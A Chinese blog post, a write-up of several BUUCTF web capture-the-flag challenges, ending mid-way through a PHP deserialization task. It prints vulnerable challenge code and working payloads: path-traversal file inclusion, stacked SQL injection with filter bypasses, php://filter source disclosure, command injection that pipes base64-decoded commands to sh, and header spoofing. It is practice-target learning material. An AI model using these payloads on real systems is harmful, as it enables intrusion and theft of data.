<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="WarmUp题目提示是代码审计，打开网页查看源码可以找到了一个source.php文件，打开文件代码： 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647&lt;?php    highlight_file(__FILE__);    class emmm    &amp;#123;">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF">
<meta property="og:url" content="http://example.com/2021/04/11/article-title-26/index.html">
<meta property="og:site_name" content="Yanghaoxuan&#39;sBlog">
<meta property="og:description" content="WarmUp题目提示是代码审计，打开网页查看源码可以找到了一个source.php文件，打开文件代码： 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647&lt;?php    highlight_file(__FILE__);    class emmm    &amp;#123;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/13/cyPma6.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/13/cyPSaV.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/13/cyCjrn.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/20/c7JNfU.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/20/c7J0X9.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/20/c7JDmR.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/20/cHay36.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/26/gpw7QO.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/29/gASprQ.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/29/gkzv28.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/29/gkzxxS.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/29/gASSKg.png">
<meta property="og:image" content="https://z3.ax1x.com/2021/04/29/gAS3Px.png">
<meta property="article:published_time" content="2021-04-11T12:59:12.000Z">
<meta property="article:modified_time" content="2021-05-09T08:11:32.465Z">
<meta property="article:author" content="Yanghaoxuan">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://z3.ax1x.com/2021/04/13/cyPma6.png">

<link rel="canonical" href="http://example.com/2021/04/11/article-title-26/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>BUUCTF | Yanghaoxuan'sBlog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Yanghaoxuan'sBlog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/04/11/article-title-26/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Yanghaoxuan">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Yanghaoxuan'sBlog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          BUUCTF
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-04-11 20:59:12" itemprop="dateCreated datePublished" datetime="2021-04-11T20:59:12+08:00">2021-04-11</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-05-09 16:11:32" itemprop="dateModified" datetime="2021-05-09T16:11:32+08:00">2021-05-09</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h4 id="WarmUp"><a href="#WarmUp" class="headerlink" title="WarmUp"></a>WarmUp</h4><p>题目提示是代码审计，打开网页查看源码可以找到了一个<code>source.php</code>文件，打开文件代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">    class emmm</span><br><span class="line">    &#123;</span><br><span class="line">        public static function checkFile(&amp;$page)</span><br><span class="line">        &#123;</span><br><span class="line">            $whitelist &#x3D; [&quot;source&quot;&#x3D;&gt;&quot;source.php&quot;,&quot;hint&quot;&#x3D;&gt;&quot;hint.php&quot;];</span><br><span class="line">            if (! isset($page) || !is_string($page)) &#123;</span><br><span class="line">                echo &quot;you can&#39;t see it&quot;;</span><br><span class="line">                return false;</span><br><span class="line">            &#125;</span><br><span class="line">                    if (in_array($page, $whitelist)) &#123;</span><br><span class="line">            return true;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        $_page &#x3D; mb_substr(</span><br><span class="line">            $page,</span><br><span class="line">            0,</span><br><span class="line">            mb_strpos($page . &#39;?&#39;, &#39;?&#39;)</span><br><span class="line">        );</span><br><span class="line">        if (in_array($_page, $whitelist)) &#123;</span><br><span class="line">            return true;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        $_page &#x3D; urldecode($page);</span><br><span class="line">        $_page &#x3D; mb_substr(</span><br><span class="line">            $_page,</span><br><span class="line">            0,</span><br><span class="line">            mb_strpos($_page . &#39;?&#39;, &#39;?&#39;)</span><br><span class="line">        );</span><br><span class="line">        if (in_array($_page, $whitelist)) &#123;</span><br><span class="line">            return true;</span><br><span class="line">        &#125;</span><br><span class="line">        echo &quot;you can&#39;t see it&quot;;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if (! empty($_REQUEST[&#39;file&#39;])</span><br><span class="line">    &amp;&amp; is_string($_REQUEST[&#39;file&#39;])</span><br><span class="line">    &amp;&amp; emmm::checkFile($_REQUEST[&#39;file&#39;])</span><br><span class="line">) &#123;</span><br><span class="line">    include $_REQUEST[&#39;file&#39;];</span><br><span class="line">    exit;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    echo &quot;&lt;br&gt;&lt;img src&#x3D;\&quot;https:&#x2F;&#x2F;i.loli.net&#x2F;2018&#x2F;11&#x2F;01&#x2F;5bdb0d93dc794.jpg\&quot; &#x2F;&gt;&quot;;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>发现有个<code>hint.php</code>，进去看一看，得到一句话<code>flag not here, and flag in ffffllllaaaagggg</code></p>
<p>粗略的看了一下整体代码，是白名单验证，文件包含只能包含<code>source.php</code>和<code>hint.php</code>，还要通过checkFile()函数的检查</p>
<p>第2个if语句是检查payload中？之间的字符串，如果在白名单中则可以通过</p>
<p>第3个if语句是经过url编码后再验证是否在白名单中，在则通过</p>
<p>看完答案还需要用到目录穿越，构建的payload：<code>?file=source.php%253f/../../../../../../ffffllllaaaaggg</code>（url编码两次是因为服务器每次解析时会自带一次url解码，所以一次url编码是对付服务器的，而另一次编码就是对付checkFile()函数中的urldecode()的。）</p>
<p>也可以这样构造：<code>?file=source.php?/../../../../../../../../ffffllllaaaagggg</code></p>
<p>至于穿越几层可以慢慢去试</p>
<h4 id="随便注"><a href="#随便注" class="headerlink" title="随便注"></a>随便注</h4><p>先尝试闭合符以及注释符，可以得出闭合符为单引号<code>&#39;</code>注释符为<code>#</code>，<code>order by</code>语句得出字段为2，但在联合查询是发现字符串<code>select</code>被过滤，所以此方法行不通，用堆叠注入</p>
<p><img src="https://z3.ax1x.com/2021/04/13/cyPma6.png" alt="image-20210413190045251"></p>
<p>万能钥匙<code> &#39; or 1=1#</code>,根据回显发现flag不在当前表格中</p>
<p><code>&#39;;show databases; #</code>可以得到所以的数据库，进一步查表<code>&#39;;show tables; #</code>得到一下两个表</p>
<p><img src="https://z3.ax1x.com/2021/04/13/cyPSaV.png" alt="image-20210413191055068"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&#39;;desc &#96;1919810931114514&#96;;#</span><br><span class="line">1&#39;;desc &#96;words&#96;;#</span><br></pre></td></tr></table></figure>

<p>分别查看两个表，发现flag在第一个表中(windows系统中需要用反引号闭合表)，但是由于字符串过滤，所以这里可以用预处理拿flag</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1&#39;;		闭合前面语句</span><br><span class="line">set @sql&#x3D;concat(&#39;se&#39;,&#39;lect * from &#96;1919810931114514&#96;;&#39;);	拼接查询语句</span><br><span class="line">prepare stml from @sql;	利用prepare预定义一个语句，并将它赋给stml</span><br><span class="line">execute stml;	执行stml</span><br></pre></td></tr></table></figure>

<p>执行之后回显</p>
<p><img src="https://z3.ax1x.com/2021/04/13/cyCjrn.png" alt="image-20210413192710256"></p>
<p><code>strstr($inject, &quot;set&quot;) &amp;&amp; strstr($inject, &quot;prepare&quot;)</code>这个函数查找了语句中的<code>set</code>和<code>prepare</code>字符串，可以用大小写方法绕过</p>
<p>最终<code>1&#39;; sEt @sql=CONCAT(&#39;se&#39;,&#39;lect * from 1919810931114514;&#39;); prepAre stmt from @sql; execute stmt;</code></p>
<h4 id="EasySql"><a href="#EasySql" class="headerlink" title="EasySql"></a>EasySql</h4><p>开头还是一样判断闭合符和注释符，尝试了一大堆要么就是回显空白要么就是回显nonono，估计是过滤了很多关键词，联合查询的语句也没有用，所以也没有去考虑布尔盲注和延时注入，又试了试堆叠注入，发现了两个可以使用的语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1;show databases;</span><br><span class="line">1;show tables;</span><br></pre></td></tr></table></figure>

<p>发现一个名为Flag的表，flag应该就在这个表中，过滤太强大而且会的方法都不行用那就看看wp</p>
<p>要用到<code>||</code>符号，而且需要用到<code>set sql_mode=PIPES_AS_CONCAT;</code>语句来调整mysql 的sql_mode 模式通过 <code>||</code>  来实现字符串拼接(<code>||</code>在MySQL中默认是作为运算符而不是连接符）</p>
<p>修改完之后执行这个语句<code>select 1 || 2 from xxx;</code>其实会分为三步：</p>
<p>1.先执行<code>select 1 from xxx;</code>得到结果为1</p>
<p>2.再执行<code>select 2 from xxx;</code>得到结果为2</p>
<p>3.最后将两者的结果拼在一起得到12</p>
<p>wp里的最终payload:<code>1;set sql_mode=PIPES_AS_CONCAT;select 1</code></p>
<p>这个payload最终到后端其实是执行了三条语句。<br> <code>select 1;</code>  输出 1;<br> <code>set sql_mode=PIPES_AS_CONCAT;</code> 修改sql_mode无输出<br> <code>select 1 || flag from Flag</code>。 输出 1+flag的内容(无法理解XD)</p>
<h4 id="Include"><a href="#Include" class="headerlink" title="Include"></a>Include</h4><p>打开页面是一个名为<code>tips</code>的超链接，转向的是<code>?file=flag.php</code>,但是页面啥也没有回显，我只记得之前用php伪协议时的题也是这样的场景，就试了试，构建payload:</p>
<p><code>?file=php://filter/convert.base64-encode/resource=flag.php</code></p>
<p>成功拿到结果base64编码的flag</p>
<h4 id="Secret-File"><a href="#Secret-File" class="headerlink" title="Secret File"></a>Secret File</h4><p>查看网页源码，可以找到一个链接，指向<code>./Archive_room.php</code></p>
<p>进入之后回显如下：</p>
<p><img src="https://z3.ax1x.com/2021/04/20/c7JNfU.png" alt="屏幕截图 2021-04-20 124845"></p>
<p>点击按钮，进入下一个页面</p>
<p><img src="https://z3.ax1x.com/2021/04/20/c7J0X9.png" alt="屏幕截图 2021-04-20 124903"></p>
<p>两个页面的代码都看了一遍，没发现东西，就抓包试了试，找到了<code>secr3t.php</code>,打开可以看到一段代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">    &lt;title&gt;secret&lt;&#x2F;title&gt;</span><br><span class="line">    &lt;meta charset&#x3D;&quot;UTF-8&quot;&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">    error_reporting(0);</span><br><span class="line">    $file&#x3D;$_GET[&#39;file&#39;];</span><br><span class="line">    if(strstr($file,&quot;..&#x2F;&quot;)||stristr($file, &quot;tp&quot;)||stristr($file,&quot;input&quot;)||stristr($file,&quot;data&quot;))&#123;</span><br><span class="line">        echo &quot;Oh no!&quot;;</span><br><span class="line">        exit();</span><br><span class="line">    &#125;</span><br><span class="line">    include($file); </span><br><span class="line">&#x2F;&#x2F;flag放在了flag.php里</span><br><span class="line">?&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br></pre></td></tr></table></figure>

<p>flag应该就在<code>flag.php</code>里，打开<code>flag.php</code></p>
<p><img src="https://z3.ax1x.com/2021/04/20/c7JDmR.png" alt="屏幕截图 2021-04-20 125247"></p>
<p>根据文字写的，找到了可是看不到，应该是和上一关一样要用到php伪协议</p>
<p>构建payl:<code>secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php</code></p>
<p>成功拿到base64加密的代码，再进行解密即可拿到flag</p>
<h4 id="Exec"><a href="#Exec" class="headerlink" title="Exec"></a>Exec</h4><p>首先需要输入一个ping命令，输入正常ip:<code>127.0.0.1</code>,回显正常</p>
<p>测试管道连接符<code>|</code>是否能用:<code>127.0.0.1 | ls</code></p>
<p><img src="https://z3.ax1x.com/2021/04/20/cHay36.png" alt="屏幕截图 2021-04-20 205751"></p>
<p>管道连接符<code>|</code>可以正常使用，并且<code>ls</code>命令可以正常执行(ls看文件目录)，接下来查看根目录:<code>127.0.0.1 | ls /</code>,可以看到一个<code>flag</code>的文件，使用<code>cat</code>命令查看(cat命令是linux下的一个文本输出命令，通常是用于观看某个文件的内容的)：</p>
<p><code>127.0.0.1 | cat /flag</code></p>
<p>成功拿到flag</p>
<h4 id="Ping-Ping-Ping"><a href="#Ping-Ping-Ping" class="headerlink" title="Ping Ping Ping"></a>Ping Ping Ping</h4><p>开始还是正常ping一下:<code>127.0.0.1</code>,回显正常，于是下一步还是用上一关的方式<code>127.0.0.1 | ls</code>，但是回显<code>/?ip= fxck your space!</code>也就是空格被过滤了，<code>$&#123;IFS&#125;</code> <code>$&#123;IFS&#125;$1</code> <code>$IFS$1</code>可以用来过滤空格，但是这一关只有第三个能成功过滤，一个<code>&#123;&#125;</code>也被过滤了</p>
<p>构建payload:<code>?ip=127.0.0.1;cat$IFS$1index.php</code>或<code>?ip=127.0.0.1$IFS$1|$IFS$1cat$IFS$1index.php</code>可以成功拿到代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">PING 127.0.0.1 (127.0.0.1): 56 data bytes</span><br><span class="line">&#x2F;?ip&#x3D;</span><br><span class="line">|\&#39;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;&#x2F;&quot;, $ip, $match))&#123;</span><br><span class="line">    echo preg_match(&quot;&#x2F;\&amp;|\&#x2F;|\?|\*|\&lt;|[\x&#123;00&#125;-\x&#123;20&#125;]|\&gt;|\&#39;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;&#x2F;&quot;, $ip, $match);</span><br><span class="line">    die(&quot;fxck your symbol!&quot;);</span><br><span class="line">  &#125; else if(preg_match(&quot;&#x2F; &#x2F;&quot;, $ip))&#123;</span><br><span class="line">    die(&quot;fxck your space!&quot;);</span><br><span class="line">  &#125; else if(preg_match(&quot;&#x2F;bash&#x2F;&quot;, $ip))&#123;</span><br><span class="line">    die(&quot;fxck your bash!&quot;);</span><br><span class="line">  &#125; else if(preg_match(&quot;&#x2F;.*f.*l.*a.*g.*&#x2F;&quot;, $ip))&#123;</span><br><span class="line">    die(&quot;fxck your flag!&quot;);</span><br><span class="line">  &#125;</span><br><span class="line">  $a &#x3D; shell_exec(&quot;ping -c 4 &quot;.$ip);</span><br><span class="line">  echo &quot;</span><br><span class="line"></span><br><span class="line">&quot;;</span><br><span class="line">  print_r($a);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>可以看到很多符号被过滤了，包括<code>bash</code> <code>flag</code>等字符串，看完wp，过滤这关的黑名单要用到base64编码</p>
<p>构建payload:<code>?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh</code></p>
<p><code>cat flag.php</code>经过base64加密后就是<code>Y2F0IGZsYWcucGhw</code>，sh估计和bash差不多，因为bash字符串被过滤，所以这里用的是sh，用base64编码绕过黑名单有两种方法，一种是|base64 -d|bash，另一种是|base64 -d`</p>
<p>之后可以在网页源码里找到flag</p>
<p>本关绕过黑名单还可以用拼接</p>
<p>payload:<code>?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php</code></p>
<p><code>a=f</code> <code>a=l</code> <code>a=a</code>都拿不到flag，理解不了</p>
<h4 id="easy-calc"><a href="#easy-calc" class="headerlink" title="easy calc"></a>easy calc</h4><h5 id="php字符串解析特性绕过WAF"><a href="#php字符串解析特性绕过WAF" class="headerlink" title="php字符串解析特性绕过WAF"></a>php字符串解析特性绕过WAF</h5><p>PHP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事：<br> 1.删除空白符<br> 2.将某些字符转换为下划线（包括空格）</p>
<p>首先打开网页，是一个类似于计算器的页面，看看网页源码可以找到一个<code>calc.php</code>的文件，打开是php代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">if(!isset($_GET[&#39;num&#39;]))&#123;</span><br><span class="line">    show_source(__FILE__);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">        $str &#x3D; $_GET[&#39;num&#39;];</span><br><span class="line">        $blacklist &#x3D; [&#39; &#39;, &#39;\t&#39;, &#39;\r&#39;, &#39;\n&#39;,&#39;\&#39;&#39;, &#39;&quot;&#39;, &#39;&#96;&#39;, &#39;\[&#39;, &#39;\]&#39;,&#39;\$&#39;,&#39;\\&#39;,&#39;\^&#39;];</span><br><span class="line">        foreach ($blacklist as $blackitem) &#123;</span><br><span class="line">                if (preg_match(&#39;&#x2F;&#39; . $blackitem . &#39;&#x2F;m&#39;, $str)) &#123;</span><br><span class="line">                        die(&quot;what are you want to do?&quot;);</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        eval(&#39;echo &#39;.$str.&#39;;&#39;);</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>应该就是要传一个<code>num</code>的值，然后设置了黑名单进行过滤</p>
<p><code>foreach()</code>语法结构提供了遍历数组的简单方式,会对黑名单中的每一个值都拿出来连接成正则表达式的字符串，/m表示多行查找</p>
<p>接下来就要用到php字符串解析特性，构建两个payload:</p>
<p><code>/calc.php?num=phpinfo()</code> 不可绕过waf</p>
<p><code>/calc.php? num=phpinfo()</code> 可绕过waf</p>
<p>在<code>calc.php</code>中，可以发现是对num变量进行的一个过滤，并没有对 num变量过滤，因此可以对 num进行传参</p>
<p>接下来要认识几个函数：</p>
<p>1.<code>var_dump ()</code> 用于输出变量的相关信息。</p>
<p>2.<code>scandir()</code> 返回指定目录中的文件和目录的数组。</p>
<p>3.<code>file_get_contents()</code> 把整个文件读入一个字符串中。</p>
<p>首先看根目录:<code>/calc.php? num=var_dump(scandir(chr(47)))</code>这里用到了ASCII码的绕过</p>
<p>原payload：<code>/calc.php? num=var_dump(scandir(/))</code>,但因为<code>/</code>字符被过滤，所以改为ASCII码值</p>
<p><img src="https://z3.ax1x.com/2021/04/26/gpw7QO.png" alt="Screenshot 2021-04-26 225606"></p>
<p>可以发现一个名为<code>f1agg</code>的文件，所以还是用ASCII码绕过：</p>
<p><code>? num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))</code></p>
<p>成功拿到flag</p>
<h4 id="http"><a href="#http" class="headerlink" title="http"></a>http</h4><p>打开网页首先还是看看源码，花一天时间(不是 可以找到一个<code>Secret.php</code>的文件，打开之后网页的回显</p>
<p><img src="https://z3.ax1x.com/2021/04/29/gASprQ.png" alt="屏幕截图 2021-04-29 230106"></p>
<p>要求我们从指定的网址访问，所以就用火狐的插件将<code>referer</code>改为所提供的链接，回显</p>
<p><img src="https://z3.ax1x.com/2021/04/29/gkzv28.png" alt="屏幕截图 2021-04-29 230141"></p>
<p><img src="https://z3.ax1x.com/2021/04/29/gkzxxS.png" alt="屏幕截图 2021-04-29 230159"></p>
<p>又要求从指定的浏览器问，那就再改UA，回显</p>
<p><img src="https://z3.ax1x.com/2021/04/29/gASSKg.png" alt="屏幕截图 2021-04-29 230903"></p>
<p>只能从本地阅读，用bp改包:X-Forwarded-For:127.0.0.1,看响应就可以拿到flag</p>
<p><img src="https://z3.ax1x.com/2021/04/29/gAS3Px.png" alt="屏幕截图 2021-04-29 231757"></p>
<h4 id="PHP"><a href="#PHP" class="headerlink" title="PHP"></a>PHP</h4><p>网页回显有备份，那就扫后台，得到压缩包解出文件</p>
<p>第一个代码和反序列化有关</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    include &#39;class.php&#39;;</span><br><span class="line">    $select &#x3D; $_GET[&#39;select&#39;];</span><br><span class="line">    $res&#x3D;unserialize(@$select);</span><br><span class="line">    ?&gt;</span><br></pre></td></tr></table></figure>

<p>第二个</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">include &#39;flag.php&#39;;</span><br><span class="line">error_reporting(0);</span><br><span class="line">class Name&#123;</span><br><span class="line">    private $username &#x3D; &#39;nonono&#39;;</span><br><span class="line">    private $password &#x3D; &#39;yesyes&#39;;</span><br><span class="line"></span><br><span class="line">    public function __construct($username,$password)&#123;</span><br><span class="line">        $this-&gt;username &#x3D; $username;</span><br><span class="line">        $this-&gt;password &#x3D; $password;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __wakeup()&#123;</span><br><span class="line">        $this-&gt;username &#x3D; &#39;guest&#39;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        if ($this-&gt;password !&#x3D; 100) &#123;</span><br><span class="line">            echo &quot;&lt;&#x2F;br&gt;NO!!!hacker!!!&lt;&#x2F;br&gt;&quot;;</span><br><span class="line">            echo &quot;You name is: &quot;;</span><br><span class="line">            echo $this-&gt;username;echo &quot;&lt;&#x2F;br&gt;&quot;;</span><br><span class="line">            echo &quot;You password is: &quot;;</span><br><span class="line">            echo $this-&gt;password;echo &quot;&lt;&#x2F;br&gt;&quot;;</span><br><span class="line">            die();</span><br><span class="line">        &#125;</span><br><span class="line">        if ($this-&gt;username &#x3D;&#x3D;&#x3D; &#39;admin&#39;) &#123;</span><br><span class="line">            global $flag;</span><br><span class="line">            echo $flag;</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            echo &quot;&lt;&#x2F;br&gt;hello my friend~~&lt;&#x2F;br&gt;sorry i can&#39;t give you the flag!&quot;;</span><br><span class="line">            die();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>大概意识就是要将username和password的值分别为admin和100，然后再将其序列化赋值给变量<code>select</code></p>
<p>先序列化生成</p>
